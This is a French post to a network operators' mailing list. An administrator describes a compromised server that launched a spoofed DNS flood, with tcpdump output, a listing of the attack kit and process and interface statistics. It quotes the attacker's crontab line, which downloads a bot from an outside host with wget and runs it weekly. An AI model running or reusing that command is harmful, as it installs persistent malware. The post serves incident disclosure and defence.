Pour information, nous avons subi un probleme connexe hier matin (2012-03-16), mais cette fois nous etions la source du flood ! un de nos serveurs a été usurpé, il a provoqué de 7H30 à 10H (heure a laquelle nous l'avons debranché ) une moyenne de 850Mbps sur notre lien Giga vers l'Internet . ci-dessous un aperçu de capture tcpdump sur notre sonde:
09:24:50.787414 IP 9.151.86.36.20695> 212.14.226.115.domain: 2570 inv_q [b2&3=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] 09:24:50.787417 IP 17.9.161.108.jtag-server> 212.14.226.115.domain: 2570 inv_q [b2&3=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] 09:24:50.787419 IP 174.161.113.91.npp> 212.14.226.115.domain: 2570 inv_q [b2&3=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] 09:24:50.787421 IP 216.91.179.98.53745> 212.14.226.115.domain: 2570 inv_q [b2&3=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] 09:24:50.787423 IP 40.151.196.109.42843> 212.14.226.115.domain: 2570 inv_q [b2&3=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] les sources IP aléatoires du tcpdump montrent que la source est spoofée . un rapide "forensic" sur le serveur incriminé, nous a montré la présence d'un kit -rw-r--r-- 1 1000 1000 1680 Jan 28 04:13 Makefile -rw-r--r-- 1 1000 1000 2692 Jan 28 04:15 fix.pl -rw-r--r-- 1 1000 1000 19774 Jan 28 04:16 pnscan.c -rw-r--r-- 1 root root 16398 Feb 4 17:58 system -rw-r--r-- 1 root root 35364 Feb 4 18:32 pnscan.o -rw-r--r-- 1 root root 6836 Feb 4 18:32 bm.o -rw-r--r-- 1 root root 1504 Feb 4 18:32 version.o -rw-r--r-- 1 root root 35171 Feb 19 02:32 kat.c -rwxr-xr-x 1 root root 28865 Feb 22 19:21 javas -rwxr-xr-x 1 root root 16068 Feb 22 19:21 pns un process "javas" provoquait le flood: # ps auwx USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 2156 672 ? Ss Feb09 0:00 init [3] root 1617 0.0 0.0 2044 700 ? S Feb22 0:08 java root 7540 53.5 0.0 0 0 ? Z 07:33 98:27 [javas] <defunct> + une contab @weekly wget http://stablehost.us/bots/regular.bot -O /root/xpath.so;chmod +x /root/xpath.so;/root/xpath.so stat sur l'interface reseau, +2 milliards de paquets ! RX packets:2251383828 errors:0 dropped:0 overruns:0 frame:0 TX packets:7973319 errors:0 dropped:1433690 overruns:0 carrier:0 collisions:0 lg file transmission:0 RX bytes:3217831605194 (2.9 TiB) TX bytes:739146885 (704.9 MiB) La machine est maintenant hors service, je reste quand meme surpris du debit généré !. --------------------------- Liste de diffusion du FRnOG http://www.frnog.org/
